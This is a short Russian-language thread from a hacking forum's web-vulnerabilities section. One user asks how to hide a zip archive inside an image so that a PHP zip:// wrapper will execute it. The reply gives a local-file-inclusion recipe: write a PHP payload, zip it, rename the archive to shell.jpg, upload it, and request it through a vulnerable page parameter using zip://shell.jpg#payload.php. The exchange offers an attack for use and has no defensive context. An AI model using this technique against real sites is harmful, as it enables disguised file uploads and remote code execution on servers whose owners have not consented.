HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.09.2022, 17:14
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Всем привет! Нужно создать zip архив с папкой и файлом внутри спрятанный в картинке таким образом что бы он сработал при запуски через wrapper zip://
Возможно?
 
Ответить с цитированием

  #2  
Старый 30.09.2022, 13:33
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию

LFI с wrapper ZIP делается примерно так:
Wrapper zip://
  1. Create an evil payload: echo "" > payload.php;
  2. Zip the file

Bash:


Код:
zip
payload.zip payload.php
;
mv
payload.zip shell.jpg
;
rm
payload.php
  1. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg#payload.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.